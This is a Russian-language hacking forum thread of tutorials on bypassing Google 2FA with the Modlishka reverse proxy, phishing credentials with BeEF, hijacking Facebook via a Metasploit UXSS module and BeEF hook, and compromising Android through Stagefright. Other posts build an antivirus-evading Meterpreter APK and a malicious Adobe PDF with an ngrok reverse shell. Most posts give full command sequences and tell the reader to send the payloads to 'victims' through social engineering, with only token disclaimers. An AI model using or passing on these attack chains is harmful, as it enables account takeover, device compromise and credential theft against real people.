Объявление

Свернуть
Пока нет объявлений.

Blackmast_education

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • Взлом 2FA: Как хакеры обходят двухфакторную аутентификацию

    Взлом 2FA: Как хакеры обходят двухфакторную аутентификацию






    Вступить в наш чат
    С ростом киберпреступности использование пароля, как основного способа защиты, уже не является панацей. Брутфорс, фишинговые атаки и утечки данных еще раз доказывают, что для защиты учетных записей необходим более надежный подход. В качестве решения этих проблем появилась многофакторная аутентификация. Однако, хакеры и тут нашли лазейку. Сегодня мы расскажем, как именно злоумышленники обходят двухфакторную аутентификацию.
    Ликбез по 2FA

    Еще совсем недавно никто и не думал о защите информации, и перехват трафика с учетными данными был легкой задачей. Позже, когда трафик стали шифровать, хакеры были вынуждены искать более изощренные способы подмены и перенаправления маршрутов.
    Двухфакторная аутентификация ввела дополнительный уровень безопасности. В добавок к паролю появился второй фактор для подтверждения своей личности, который обычно включает в себя одну из трех категорий:
    1. Что-то, что знает пользователь: это может быть любой секретный вопрос: кличка питомца или девичья фамилия матери.
    2. Что-то, чем является пользователь: сюда входят биометрические данные, такие как отпечатки пальцев, сканирование радужной оболочки или распознавание лиц.
    3. Что-то, чем владеет пользователь: например, номер телефона, на который приходят СМС.

    Самый популярный метод двухфакторной аутентификации среди всех пользователей — третий. Это SMS с проверочными кодами, генерируемыми по технологии OTP. Код доступа меняется каждый раз, поэтому угадать его практически невозможно.
    Казалось бы, двухфакторная аутентификация обеспечила высокий уровень безопасности, но не тут то было. В начале 2019 года в открытом доступе появился реверс-прокси Modlishka, который, по словам создателя, может обойти двухфакторную аутентификацию.
    Работает этот инструмент следующим образом: Modlishka размещается между жертвой и целевым сайтом, и когда пользователь подключается к серверу Modlishka на фишинговом домене, обратный прокси обращается к настоящему сайту, за который пытается себя выдать. В итоге жертва видит контент с настоящего сайта, однако весь ее трафик при этом проходит через сервер Modlishka. Также, иинструмент помогает перехватывать введенные пользователем одноразовые коды двухфакторной аутентификации.
    Взлом 2FA

    Мы продемонстрируем вам, как работает инструмент Modlishka на примере Kali Linux.
    Прежде всего вам нужно установить Go — на этом языке написан реверс-прокси, и без него он не скомпилируется.
    Следом указываем путь к директории исходников:
    $ export GOPATH='/root/go'
    Проверить все можно командой.
    В выводе должен быть указан GOPATH.
    Вывод команды
    Затем клонируем ветку с инструментом:
    $ go get -u github.com/drk1wi/Modlishka
    $ cd /root/go/src/github.com/drk1wi/Modlishka/
    Создаем сертификат:
    $ openssl genrsa -out secret.key 2048
    $ openssl req -x509 -new -nodes -key secret.key -sha256 -days 1024 -out cert.pem
    Теперь необходимо перенести содержимое ключа и сертификата в файл plugin/autocert.go и заменить значение двух переменных:
    • const CA_CERT — значение сертификата (файл pem);
    • const CA_CERT_KEY — значение ключа (файл key).

    Файл autocert.go после замены сертификата
    Теперь собираем все это дело:
    Занимает компиляция от трех до десяти минут в зависимости от количества вычислительных ресурсов.
    Сам запускаемый файл находится в директории dist/ под названием proxy. Для проверки можно запустить с ключом -h — вывод справки.
    Вывод справки программы Modlishka
    Как мы писали выше, чтобы создать прозрачный для жертвы шифрованный канал до нашего реверс-прокси, необходимо сперва экспортировать в браузер сертификат. Дальнейшие действия разбираются на примере Mozilla Firefox x64 v. 67.0.
    Перед запуском взглянем внимательно на содержимое еще одного файла в директории templates. Нам интересен google.com_gsuite.json. Подробное описание каждого пункта можно найти в гайде по этому конфигу.
    Содержимое файла google.com_gsuite.json
    Есть два варианта запуска Modlishka: вручную и с помощью конфигурационного файла.
    Для запуска вручную минимальная команда выглядит так:
    $ ./dist/proxy -target https://google.com -phishingDomain loopback.modlishka.io -listeningPort 443 -tls
    Запуск с использованием конфигурационного файла:
    $ ./dist/proxy -config /templates/google.com_gsuite.json
    Запустим из конфига и перейдем в браузере по адресу loopback.modlishka.io. Нам откроется страница google.com.
    Входим в аккаунт и видим, как в выводе терминала появляются учетные данные жертвы.
    Логин и пароль в выводе Modlishka
    Если перейти по адресу loopback.modlishka.io/SayHello2Modlishka, то получим консоль управления перехваченной сессией (в данный момент это бета-функция). На данном этапе мы перехватили логин и пароль жертвы безо всяких ошибок с шифрованием и в «защищенном» соединении.
    Что же теперь делать с двухфакторной аутентификацией?
    А вот что: в панели управления есть незаполненное поле UUID, и эта цифра — ключ ко всему.
    Если сразу нажать на кнопку Impersonate user (beta), то откроется пустая вкладка, и в консоли Modlishka нам подскажет, что нет UID пользователя. Его необходимо задать, а задается он в самом начале — указывается в ссылке на наш URL. Для этого вернемся к конфигурационному файлу.
    Нам интересна строка «trackingParam»: «ident». В ней необходимо задать значение ident, чтобы наш URL выглядел следующим образом:
    https://loopback.modlishka.io/?ident=1
    Именно на такой URL необходимо направить жертву.
    На этот раз, после перехода и авторизации по такой ссылке, в панели управления (loopback.modlishka.io/SayHello2Modlishka) будет доступна сессия с заполненным UUID. Как именно это выглядит, мы покажем чуть позже на реальном примере.
    Теперь при нажатии на большую желтую кнопку мы увидим красивую синюю анимацию и через пять-десять секунд попадем в авторизованную сессию жертвы, невзирая на трудности двухфакторной авторизации. Жертва, как обычно, получит и введет подтверждающий код, видя зашифрованное соединение и настоящую панель авторизации Google, но не замечая вклинившегося посередине реверс-прокси Modlishka.
    Есть еще один момент, о котором нигде не сказано: после того как жертва ввела учетные данные, желательно предотвратить выход из аккаунта и сохранить авторизованную сессию. Это делает параметр terminateTriggers. Если в этом параметре указать URL, на который попадет пользователь после успешной авторизации, то при появлении такого адреса весь трафик начнет перенаправляться на оригинальный URL, а авторизованная сессия не будет тронута даже после выхода из аккаунта.
    Сессия в панели управления Modlishka не закрывается до тех пор, пока из нее самой не выйдет пользователь (либо хакер). То есть, если жертва закроет вкладку, авторизованная сессия останется активной. Если заново авторизоваться напрямую на google.com, а потом выйти из аккаунта, то сессия все равно будет активной. Даже если закрыть сервер Modlishka и запустить его заново — сессия все равно еще останется. Есть только одна гарантированная возможность деавторизации — выйти в тот момент, когда только «редиректишься» на прокси.
    Заключение

    Таким образом, мы убедились, что двухфакторная аутентификация не является 100% надежным способом защиты. Для обеспечения безопасности необходимо комбинировать несколько уровней проверки, прибегая к трехфакторной аутентификации.
    Читайте также: Эволюция MFA: все, что вам нужно знать о многофакторной аутентификации

    Комментарий


    • Ниче себе столько инфы)
      Пол-часа читал)) хорошо что с примеравми команд

      Комментарий


      • Beef: Взлом через браузер

        Beef: Взлом через браузер





        Вступить в наш чат
        В области кибербезопасности Kali Linux стала популярной операционной системой. Её широкий спектр инструментов позволяет хакерам эффективно выявлять уязвимости и совершать различные атаки. Одним из таких мощных инструментов в арсенале Kali Linux является Beef.
        В этой статье мы расскажем, как с помощью Beef можно украсть учетные данные из браузера нашей цели.





        Что такое Beef

        Beef, также известный как Browser Exploitation Framework, представляет собой инструмент тестирования на проникновение, предназначенный для удаленного использования веб-браузеров и управления ими.
        Взлом Beef подразумевает подключение одного или нескольких веб-браузеров и использование их для запуска командных модулей для атаки на целевую систему в браузере.
        Принцип работы

        Оценка безопасности. Beef является незаменимым инструментом при проведении оценок безопасности веб-браузеров. Он помогает выявлять слабые места и уязвимости, используя межсайтовый скриптинг (XSS), перехват сеансов, кражу файлов cookie и другие уязвимости в браузере.
        Взлом. Beef действует как централизованный пункт управления и контроля, позволяя хакерам получать удаленный доступ и контролировать взломанные браузеры. Этот элемент управления дает возможность выполнять различные задачи, такие как кейлоггинг, сканирование сети, захват экрана и инициирование дальнейших атак на целевую систему.
        Установка

        BeeF является кроссплатформенным и может быть установлен на Linux, MacOS или Windows систему. Мы в свою очередь покажем, как работает интрумент на примере Kali Linux.
        • Запустите терминал Kali Linux и введите команду «apt-get install beef-xss». Это установит Beef вместе с его зависимостями.
        • Настройте файлы конфигурации в соответствии с вашими требованиями. Измените настройки, такие как сетевые интерфейсы, методы проверки подлинности и параметры ведения журнала.
        • Введите команду «service beef start» в терминале, чтобы запустить службу Beef.
        • Откройте веб-браузер и перейдите по адресу «http://localhost:3000/ui/panel», чтобы получить доступ к веб-интерфейсу Beef.
        • Используйте доступные модули Beef для запуска атак, использования уязвимостей и оценки безопасности.

        Модули распределены по следующим категориям:
        • сбор информации;
        • социо-технические векторы;
        • сетевое обнаружение;
        • metasploit;
        • туннелирование;
        • XSS-rays (поиск XSS);
        • модуль удержания;
        • гео-локация.

        С помощью этих модулей можно производить разведку и анализ сетевых устройств, используя браузер жертвы как плацдарм для атаки.
        Запуск социально-инженерной атаки

        Сейчас мы проведем социально-инженерную атаку на нашу жертву с целью получения данных для входа в систему. Нам нужно только выбрать нужную команду и выполнить ее.



        Мы получим данные для входа в систему gmail пользователя.
        Когда мы выполним команду, жертва будет перенаправлена на веб-страницу, похожую на страницу входа в систему google, где требуется ввести имя пользователя и пароль, как показано ниже.



        Как только пользователь введет свое имя пользователя и пароль, мы сможем просмотреть его прямо из нашего фреймворка.
        После того как пользователь нажмет на кнопку входа, он будет перенаправлен на официальную страницу входа в Google. Это помогает сделать атаку более скрытной.



        Теперь у нас есть имя пользователя и пароль электронной почты.
        Beef также действует как продвинутый кейлоггер и способен собирать ключи, на которые нажимала жертва во время использования браузера, что делает его еще более опасным.
        Преимущества Beef

        • Поддержка модулей. Beef поддерживает широкий спектр модулей, что позволяет использовать готовые эксплойты и атаки. Более того, эти модули можно легко настроить и настроить в соответствии с конкретными требованиями, что экономит время и усилия при взломе и тестировании на проникновение.
        • Настройка перехвата. Кроме того, Beef обеспечивает гибкость настройки механизмов перехвата, позволяя тестировщикам внедрять и выполнять свой собственный код JavaScript в скомпрометированном браузере. Следовательно, этот уровень настройки повышает точность и контроль над процессом эксплуатации.
        • Социальная инженерия. С помощью Beef хакеры могут имитировать атаки социальной инженерии, обманом вынуждая раскрывать конфиденциальную информацию или перенаправляя пользователей на вредоносные веб-сайты.
        • Кроссплатформенная совместимость. Beef предназначен для работы в разных операционных системах, что делает его универсальным инстурментом. Будь то Windows, macOS или Linux, Beef можно использовать для тестирования безопасности и взлома на широком спектре платформ, обеспечивая всесторонний охват.
        • Анализ. Наконец, Beef предлагает расширенные функции для создания отчетов. Они включают такую ​​информацию, как использованные уязвимости, скомпрометированные системы и рекомендации по исправлению. Следовательно, такой всеобъемлющий анализ помогает проводить успешные атаки и эффективно устранять уязвимости.

        Заключение

        Beef — мощный инструмент, который включил в себя множество функций для тестирования на проникновение и взлома. Возможность удаленного использования и управления браузерами делают его уникальным в своем роде. Beef помогает совершать эффективные атаки, а при этичном использовании способствует созданию более безопасного цифрового ландшафта, выявляя слабые места и внедряя надежные меры безопасности.

        Комментарий


        • Взлом Facebook с помощью Metasploit и Beef

          Взлом Facebook с помощью Metasploit и Beef


          В интернете есть множество советов о том, как взломать Facebook, многие из которых являются платными, не говоря уже о том, что они не работают. Не становитесь жертвами этих мошенников, поскольку не существует волшебного метода взлома Facebook. Есть только несколько способов эксплуатации уязвимостей Facebook с помощью нашего старого доброго друга социальной инженерии.
          Если вы хотите хакнуть чей-то аккаунт в Facebook, то вам повезло – вы в правильном месте. Сегодня мы покажем, как можно использовать фреймворки Metasploit и Beef для взлома учетной записи Facebook.



          Как взломать Facebook

          Шаг 1: Запустите Kali Linux и откройте Metasploit.
          По умолчанию Metaspoilt доступен на левой боковой панели. Тот, что с большой буквой «М», — это Metasploit. Но вы также можете использовать терминал для запуска Metasploit с помощью следующей команды:
          kali > msfconsole


          Шаг 2: Найдите эксплойт.

          Давайте загрузим эксплойт, введя следующую команду:
          msf5 > use auxiliary/gather/android_stock_browser_uxss
          Шаг 3: Получите информацию об эксплойте.
          Теперь, когда мы загрузили модуль эксплойта, мы можем получить подробную информацию о нем с помощью следующей команды:
          msf5 > info
          Шаг 4: Настройте параметры.
          Нам нужно установить параметр «REMOTE_JS», чтобы подключить жертву с помощью Beef.
          Шаг 5: Откройте фреймворк Beef.
          Теперь откройте Beef. Используя этот инструмент, мы можем легко взломать браузер жертвы и получить все пароли и файлы cookie.


          Как только вы введете пароль, сервер Beef запустится, и вы увидите следующую страницу:




          Учетные данные по умолчанию — «beef» для имени пользователя и нового пароля, который вы только что установили.
          Шаг 6: Настройка JS на хук Beef.
          Вернемся к консоли Metasploit. Чтобы взломать аккаунт жертвы в Facebook, нам нужно получить доступ к её данным браузера. Для этого установим REMOTE_JS в хук на Beef.
          Для использования этого хака убедитесь, что вы используете правильный IP:
          Синтаксис: set REMOTE_JS Loading...
          Итак, в нашем случае команда Metasploit становится:
          msf5> set REMOTE_JS http://192.168.128.182:3000/hook.js
          Теперь нам нужно установить URIPATH в корневой каталог:
          msf5> set uripath /
          Шаг 7: Запуск веб-сервера Metasploit.
          Запустите веб-сервер Metasploit, на котором будет размещен хук Beef:
          msf > run
          Шаг 8:Подождите, пока жертва зайдет на сайт из своего браузера.
          Используйте социальную инженерию, чтобы заставить жертву нажать на ссылку.
          Шаг 9: Подключаем браузер к Beef через Metasploit.
          Когда жертва зайдет на наш вредоносный веб-сервер по адресу 192.168.128.182, JavaScript Beef подключится к её браузеру. Он появится в разделе «Hooked Browser» в Beef, после чего вы сможете управлять всеми данными.
          Шаг 10: Теперь проверьте, аутентифицирован ли подключенный браузер с помощью Facebook.
          Как только браузер подключится к Beef, отметьте опцию обнаружения социальных сетей. Используя эту опцию, вы сможете перехватить все данные в Facebook.
          Поздравляем, вы успешно научились взламывать аккаунты Facebook с помощью Metasploit и Beef.
          Заключение

          Facebook по праву считается социальной сетью N° 1 в мире, на защиту которой пущены все средства. Именно поэтому, не стоит питать иллюзии, думая, что можно взломать Facebook за считанные секунды. Способ, описанный выше, не так прост в реализации, и требует определенных навыков и умений. Однако, если вы примете во внимание все изложенное в этой статье, наберетесь терпения, то тогда результат не заставит себя долго ждать.






          Комментарий


          • Создаем краш ссылку для взлома андроид




            Вступить в наш чат
            Ваш телефон может рассказать о вас гораздо больше, чем вы думаете. И если ваша личная информация попадет в руки третьих лиц, то это может иметь катастрофические последствия. Злоумышленники придумывают все новые способы мониторинга мобильных устройств, и зачастую они используют уязвимости в операционной системе.
            Сегодня мы покажем вам на примере одной такой уязвимости, как хакеры взламывают андроид. Суть этого метода проста: жертва открывает вредоносную ссылку, и её телефон автоматически взламывается. Не верите? Тогда читайте до конца.




            Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
            Как работает взлом

            Эксплойт Stagefright - это критическая уязвимость в Android, которая была обнаружена исследователем кибербезопасности из Zimperium. Эта уязвимость представляет собой тип атаки переполнения буфера. Плюсом эксполойта является его удаленность. Хакер отправляет вредоносную ссылку на файл, при нажатии на которую происходит сбой библиотеки stagefright, а затем процесс перезапускается обратно на сервер, и устройство взламывается, а пользователь даже не догадывается об этом.
            А теперь давайте на практике посмотрим, как это все дело работает.
            Взлом Android ссылкой

            Шаг 1: Загрузите Kali Linux.
            Запустите свой компьютер с Kali Linux и откройте Metasploit.
            Шаг 2: Настройте Metasploit для использования эксплойта Stagefright.
            Чтобы настроить Metasploit, введите команды в консоли msf:
            use exploit/android/browser/stagefright_mp4_tx3g_64bit
            Затем введите следующее: set SRVHOST 192.168.182.136 (здесь ваш IP)
            Теперь введите: set URIPATH /
            Вам нужно установить полезную нагрузку для этого типа с помощью следующей команды: set payload linux/armle/meterpreter/reverse_tcp
            Установите свой IP-адрес: set lhost 192.168.182.136 (здесь ваш IP)
            Введите эту команду для подробного режима: set verbose true exploit -j
            Шаг 3: Отправьте вредоносную ссылку жертве.
            В нашем случае ссылка получилась такой: http://192.168.182.136:8080/
            Как только жертва нажмет на ссылку, ее телефон будет взломан. И вы сможете управлять им удаленно с помощью эксплойта stagefright.
            Советы по безопасности

            Вот несколько советов, которые вы можете использовать для предотвращения взлома телефона:
            • Не открывайте ссылки, отправленные в текстовых сообщениях и электронных письмах, без проверки источника;
            • Устанавливайте приложения только из официального магазина игр. Не открывайте неизвестные ссылки и файлы, которым вы не доверяете;
            • Не подключайте телефон к общедоступной сети Wi-Fi без использования VPN;
            • Регулярно обновляйте ваше устройство. Данная уязвимость уже исправлена разработчиками, поэтому проверьте ваше устройство на наличие последних обновлений;
            • Установите хороший антивирус на свое устройство Android.

            Комментарий


            • Как обойти антивирус с помощью Apk Wash




              Вступить в наш чатАнтивирусы — чрезвычайно полезные инструменты — но не в тех ситуациях, когда вам нужно оставаться незамеченным в атакуемой сети. Обход антивируса на андроиде — одна из самых сложных задач. Ну, по крайней мере, так было раньше, пока у нас не появились такие инструменты, как Apk Bleach и Apk Wash, которые могут скрыть вредоносные приложения от обнаружения антивирусами. Сегодня мы покажем, как хакеры обходят антивирусную защиту на андроиде, избежав обнаружения во время взлома и тестирования на проникновение.




              Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
              Возможности инструмента

              • Stealth option — этот параметр позволяет вам определить количество сеансов эксплойта, которые будут созданы.
              • Icon injection — с помощью этой опции выберите значок, который вы хотите отобразить на устройстве жертвы. Вы также можете создать свою собственную иконку.
              • Application renaming —придумайте название вашему приложению.
              • Signing the apk — подпишите apk. Поскольку msfvenom создает неподписанные приложения для Android, иструмент использует jar signer для подписи сгенерированных полезных нагрузок.

              Apk Wash также позволяет построчно редактировать разрешения. Инструмент просматривает каждое из разрешений и запрашивает разрешение на их удаление или сохранение.
              Установка инструмента

              Шаг 1: Загрузите Apk Wash и клонируйте его в Kali Linux с помощью следующей команды:
              git clone https://github.com/jbreed/apkwash.git Шаг 2: Предоставьте разрешения инструменту с помощью следующей команды, как показано ниже:
              ****d +x apkwash mv apkwash /usr/local/bin/. Шаг 3: Теперь мы можем использовать следующую команду для создания вредоносного файла:
              Ниже приведены параметры, которые вы можете использовать, чтобы создать вредоносные файлы:
              -p | –payload <payload> Устанавливает полезную нагрузку, которая будет сгенерирована msfvenom.
              -о | –output <outfile.apk> Задает имя созданного APK, а также файл apk.
              -х | –original <infile.apk> APK для внедрения полезной нагрузки.
              -g | –generate Генерирует полезную нагрузку, используя значения по умолчанию.
              -n | –newkey Генерирует новый ключ отладки перед подписью.
              -v | – verbose Показывает вывод команд.
              -d | – d***g Оставляет файлы /tmp/payload на месте для просмотра.
              -h | – help Справочная информация.
              apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk Шаг 4: Теперь у вас есть вредоносный apk-файл, который нельзя обнаружить антивирусом. Существует всего несколько антивирусов, которые могут помечать этот файл как вирус, но это случается очень редко.
              Теперь отправьте ваше приложение жертве, используя методы социальной инженерии. Убедитесь, что жертва загрузит и установит приложение на свой андроид, после чего вы сможете удаленно отправлять команды на ее устройство. Стоит отметить, что установка проходит гладко, без каких-либо подозрительных уведомлений от Google Play Protect.
              Заключение

              Наверняка вы сталкивались с ситуациями, когда доступ к атакуемой сети получен и от заветной цели вас отделяет всего один маленький шаг, а антивирус не позволяет вам сделать этот шаг (например, не дает запустить нужную программу). Во многих случаях у вас есть только одна попытка — и она терпит неудачу из-за тревоги, поднятой антивирусом. Иногда антивирусы удаляют абсолютно безобидные файлы, а не только исполняемые. В результате скрыть реальную угрозу становится крайне сложно. В этой ситуации на помощь приходит Apk Wash, который не даст антивирусу себя обнаружить. Сегодня вы не только узнали о существовании такого нужного инструмента, но и научились использовать его на практике. На этом все. Удачи!

              Комментарий


              • Взлом ОС Windows с помощью Adobe PDF

                Взлом ОС Windows с помощью Adobe PDF





                В этой статье мы узнаем, как хакеры взламывают Windows 10 с помощью эксплойта Adobe PDF. Мы будем использовать инструмент Ngrok для переадресации портов, который доступен для Linux, Windows и macOS. Ngrok помогает осуществить взлом через Интернет и атаковать за пределами локальной сети.
                Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
                Взлом Windows с помощью Adobe PDF

                Требования:
                • Установленный Kali Linux и Ngrok;
                • Цель должна иметь Adobe Reader версии 8 или 9.

                Этапы взлома Windows:
                1. Создание вредоносного PDF-файла с помощью Metasploit;
                2. Переадресация портов с помощью Ngrok, чтобы взлом работал через Интернет;
                3. Запуск прослушивателя для вредоносной полезной нагрузки с помощью Msfconsole.
                1. Создание вредоносной полезной нагрузки с использованием Metasploit Framework

                Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы запустить Metasploit:
                msfconsole

                Шаг 2: Существует множество эксплойтов Windows. В этом мануале мы будем использовать эксплойт Adobe pdf. Вы же можете выбрать любой другой эксплойт.
                Введите следующую команду, чтобы использовать эксплойт Adobe PDF:
                use exploit/windows/fileformat/adobe_pdf_embedded_exe
                Шаг 3: Теперь, когда мы выбрали эксплойт, нам нужно указать полезную нагрузку для внедрения во вредоносный файл Adobe PDF. Для этого введите следующую команду:
                set payload windows/meterpreter/reverse_tcp
                2. Переадресация портов с помощью Ngrok

                Шаг 4: Теперь нам нужно запустить службу Ngrok, чтобы мы могли использовать переадресацию портов на нашей машине. Чтобы запустить службу ngrok, введите следующую команду:
                ./ngrok tcp 1234
                Шаг 5: После того, как вы запустили службу Ngrok, вы увидите следующее:
                Адрес перед двоеточием ( — это ваш LHOST, а после двоеточия — LPORT: см. изображение ниже:



                Примечание: ваши LHOST и LPORT будут отличаться от тех, что видите на скриншоте. Замените их на LHOST и LPORT.
                Если вы хотите использовать взлом в локальной сети, то замените LHOST и LPORT на свой собственный локальный IP-адрес. Вы можете узнать его с помощью команды ifconfig.
                Шаг 6: Теперь, чтобы настроить LHOST, введите следующую команду:
                set LHOST 0.tcp.ngrok.io
                Шаг 7: Чтобы настроить LPORT, введите следующую команду:
                set LPORT 13288
                Шаг 8: Установите имя файла:
                set FILENAME test.pdf
                Шаг 9: Введите следующее, чтобы запустить эксплойт и создать вредоносный pdf-файл:
                exploit
                Таким образом, Metasploit создал файл Adobe PDF с именем test.pdf. Metasploit по умолчанию поместит файл в /root/.msf4/local/test.pdf. Проверьте этот каталог на наличие вредоносного PDF-файла. После чего вам нужно будет отправить этот PDF-файл жертве, используя приемы социальной инженерии.
                3. Создание прослушивателя для вредоносной полезной нагрузки PDF

                Чтобы создать прослушиватель для нашего вредоносного эксплойта Adobe pdf, нам нужно ввести следующие команды по порядку:
                Шаг 1: Откройте Metasploit в новом терминале Kali Linux:
                msfconsole
                Шаг 2: Выполните следующие команды в том же порядке, как показано ниже:
                use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 1234 exploit Итак, как только жертва откроет вредоносный PDF-файл, будет установлено соединение Meterpreter через прослушиватель Metasploit. Далее вы сможете выполнять все остальные действия. Просто введите help, чтобы увидеть список всех возможных взломов.
                Поздравляем, вы успешно взломали Windows с помощью вредоносного pdf-файла.





                Комментарий


                • Как хакеры взламывают пароли - ТОП 7 способов

                  Как хакеры взламывают пароли - ТОП 7 способов


                  Первое, что приходит на ум, когда мы слышим слово «безопасность», — это «пароль». Однако, большинство людей не уделяют особого внимания своей безопасности, что приводит к большому количеству киберпреступлений и появлению инструментов для взлома паролей, таких как атака по словарю, атака перебором, атака по маске и многое другое. Знания о различных методах взлома паролей необходимы не только хакеру, но и обычному пользователю, чтобы предотвратить возможные взломы.
                  Итак, сегодня мы вам расскажем о 7 наиболее популярных способах взлома паролей, и как защититься от них.



                  Атака по словарю
                  Суть атаки по словарю заключается в следующем: злоумышленник загружает в целевую систему файл словаря, который работает с учетными записями пользователей. Такой способ взлома в некоторой степени устраняет случайность атаки методом грубой силы и сокращает время, необходимое для поиска пароля, при условии, что пароль присутствует в словаре. Чем проще и тривиальнее пароль пользователя, тем быстрее и успешнее результат атаки.
                  Чтобы предотвратить атаку по словарю, все, что мы можем сделать, это усложнить наши пароли, используя комбинацию различных букв, символов и цифр для большей безопасности.
                  Атака радужной таблицы

                  Атака радужной таблицы — это тип взлома, при котором злоумышленник пытается использовать радужную хэш-таблицу для взлома паролей, хранящихся в системе базы данных. Радужная таблица - это хеш-функция, используемая в криптографии для хранения важных данных, таких как пароли, в базе данных. Сервер хранит все пароли в виде хеш-строки, чтобы предотвратить любое неправильное использование паролей. Используя радужную таблицу, злоумышленник может быстро найти в базе утекших хешей паролей простые комбинации и использовать их для взлома систем.
                  Чтобы предотвратить эту атаку, нужно использовать технику, называемую «Солением». Соление — это процесс добавления уникальных случайных строк символов к паролям в базе данных или к каждому паролю перед хэшированием. Это сделано для изменения хэша и повышения безопасности паролей. Строка символов, добавляемая к паролю, называется солью.
                  Атака грубой силы

                  Атака грубой силы или брутфорс — это способ взлома с угадыванием паролей для входа в систему. Злоумышленник стремится взломать пароль, вводя различные комбинации, пока не найдет правильную.
                  Однако большинство хакеров автоматизируют этот процесс, используя программное обеспечение, которое обрабатывает исчерпывающие комбинации паролей за значительно меньший промежуток времени.
                  Тем не менее, когда дело доходит до более длинных паролей, брутфорс уже не является таким эффективным по сравнению с другими видами атак, поскольку на маловероятные угадывания тратится слишком много времени.
                  Если вы обычный пользователь, для защиты от брутфорса необходимо следовать двум несложным правилам: использовать сложные и длинные (от 8-12 символов) пароли, содержащие в себе цифры, маленькие и заглавные буквы, а также символы, а также менять пароль раз в пару месяцев (или хотя бы раз в год), так как вы не знаете, когда ваш пароль попадет в руки злоумышленникам.
                  Гибридная атака

                  Гибридная атака используется, когда злоумышленники имеют какое-то представление о пароле. Этот тип атаки считается очень опасным и эффективным, поскольку сочетает в себе комбинацию брутфорс атаки и словаря на основе увлечений и имен близкий людей пользователя.
                  Например, пользователи часто добавляют набор цифр в конце своих учетных данных, таких как год окончания или год рождения (например, lena1992 или dima2013). Таким образом, хакеры используют атаку по словарю для генерации фраз, а затем проводят атаку методом перебора последних цифр.
                  Вместо того чтобы проверять каждый пароль, гибридная атака использует набор учетных данных и создает и пробует незначительные модификации фраз по всему списку, например изменение букв или цифр.
                  Атака по маске

                  Злоумышленник использует атаку по маске, когда он уже получил некоторую информацию о пароле. Например, он знает, что пароль начинается с цифры или содержит определенный специальный символ или букву. Эта информация полезна злоумышленнику при настройке маски. В отличие от атаки по словарю, когда злоумышленник использует списки всех возможных комбинаций паролей, атака по маске имеет гораздо более конкретный характер.
                  Основная цель хакера — сократить время, необходимое для взлома пароля и также исключить любую дополнительную обработку во время взлома пароля.
                  Вредоносная атака

                  Вредоносная атака может включать в себя различные инструменты, такие как кейлоггеры, вирусы, шпионские программы, которые предназначены для кражи личных данных.
                  Злоумышленник устанавливает инструменты на целевое устройство, и они работают в фоновом режиме, собирая информацию о действиях жертвы с помощью нажатий клавиш, снимков экрана и других методов.
                  Некоторые продвинутые вредоносные программы даже ищут в системе цели словари паролей или данные, связанные с веб-браузерами. Собрав данные с целевого устройства, хакер может легко проанализировать их, чтобы получить пароль.
                  Атака методом подбора

                  Если все другие атаки по каким-то причинам терпят неудачу, хакер всегда может попытаться угадать ваш пароль, потому что зачастую он основан на предсказуемости пользователя.
                  Несмотря на все советы по созданию сложного пароля, большинство пользователей все равно выбирают пароль, который они могут легко запомнить. Эти пароли часто основаны на вещах, вызывающих эмоциональную привязанность (семья, домашние животные). Опытный хакер может легко угадать такой пароль, проведя небольшую OSINT разведку жертвы.
                  Подбор пароля является энергозатратным способом, однако в некоторых случаях эффективным, поскольку злоумышленник может взломать пароль, не прибегая к атакам по словарю или перебору, и таким образом использовать данные пользователя, даже не будучи замеченным.
                  Заключение

                  Хакеры всегда находятся в поиске новых способов взлома паролей, поэтому важно уделять особое внимание созданию надежного пароля, а также следить за новостями, чтобы быть осведомленным о различных типах атак, которым вы можете быть подвержены, и способах защиты от них. Надеемся, что данная статья оказалась полезной для вас. Удачи!

                  Комментарий


                  • Взлом Windows: как хакеры обходят систему безопасности

                    Взлом Windows: как хакеры обходят систему безопасности

                    В современную цифровую эпоху тяжело представить жизнь без компьютера. ПК защищают наши личные данные, полагаясь на пароли и различные протоколы безопасности. Так, например, пароль при входе в Windows защищает от стороннего проникновения и доступа к информации. Тем не менее, как и в любой системе, существуют уязвимости, которыми могут воспользоваться опытные хакеры.
                    В этой статье мы погрузимся в тему кибербезопасности, чтобы раскрыть секрет обхода пароля Windows и изучить меры предосторожности, которые каждый из нас может предпринять.


                    Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
                    При включении и перезагрузке компьютера операционная система запросит у вас имя пользователя и пароль, и только после успешной аутентификации вы получите доступ к ресурсам системы. Этот двухэтапный процесс направлен на защиту ваших данных, чтобы избежать несанкционированного доступа.



                    Методы обхода пароля Windows

                    • Атака методом перебора: хакеры используют автоматизированные инструменты, чтобы точно подобрать пароль с помощью разных комбинаций. За короткий промежуток времени хакеры могут легко взломать слабые пароли, тем самым подвергая риску безопасность вашей системы.
                    • Кейлоггер: вредоносное программное обеспечение записывает ваши нажатия клавиш, эффективно перехватывая учетные данные для входа в систему по мере их ввода. Впоследствии злоумышленники могут использовать украденные данные для получения несанкционированного доступа.
                    • Кража учетных данных: с помощью уязвимостей в программном обеспечении или фишинга хакеры могут обманом заставить пользователей раскрыть свои учетные данные. Этот метод основан на социальной инженерии, что делает его не менее эффективным.
                    • Уязвимости Windows: операционные системы могут иметь уязвимости, которые позволяют хакерам получать несанкционированный доступ, используя слабые места в коде. Регулярные обновления программного обеспечения помогают своевременно устранять уязвимости.
                    • Одним из самых распространенных и простых способов взлома Windows является использование кнопки «Специальные возможности».

                    Взлом с помощью «Специальных возможностей»

                    Кнопка «Специальных возможностей» на экране входа в Windows предназначена для пользователей с ограниченными возможностями, и имеет такие инструменты, как диктор, лупа и экранная клавиатура. Однако коварные хакеры нашли способ превратить эту полезную функцию в способ взломать Windows.
                    Основная идея этого эксплойта — заменить кнопку «Специальных возможностей» командной строкой, которая предоставляет доступ к интерфейсу командной строки системы. Отсюда хакер может выполнять различные команды для манипулирования системой, включая изменение паролей, создание новых учетных записей и многое другое.
